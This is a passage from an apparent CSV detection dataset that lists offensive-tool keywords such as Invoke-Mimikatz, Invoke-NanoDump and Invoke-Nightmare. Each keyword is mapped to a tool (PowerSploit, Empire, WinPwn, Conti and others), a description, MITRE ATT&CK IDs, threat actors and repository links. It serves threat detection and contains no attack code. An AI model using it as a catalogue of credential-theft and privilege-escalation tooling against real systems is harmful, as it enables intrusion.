-*Invoke-LapsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-LdapSignCheck*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-LdapSignCheck*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-LocalAdminGroupCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-LocalAdminGroupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Lockless*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Locksmith.ps1*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -*Invoke-LoginPrompt.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Invoke-LsaProtectionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-LsaProtectionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-MachineRoleCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-MalSCCM*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-MalSCCM*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-MapDomainTrust*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Merlin.ps1*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Invoke-MetaTwin*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*InvokeMeter.bat*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-MFASweep*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*Invoke-Mimikatz*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z -*Invoke-Mimikatz*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Mimikatz.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Mimikatz.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-Mimikatz.ps1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z -*Invoke-Mimikatz-old*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Invoke-MITM6*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-ModifiableProgramsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-MonitorCredSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-MS16*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-MS16032*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16032.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16032*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16135*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16135.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NamedPipePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-NanoDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-NanoDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-NetRipper*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NetworkAdaptersCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-NetworkRelay*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Nightmare -DLL *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-Nightmare -NewUser*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-Nightmare*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-NinjaCopy*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NinjaCopy*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NinjaCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-noPac.*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/Invoke-noPac,1,0,N/A,N/A,1,57,12,2023-02-16T10:45:19Z,2021-12-13T19:01:18Z -*Invoke-NTLMAuth.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-Ntsd.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 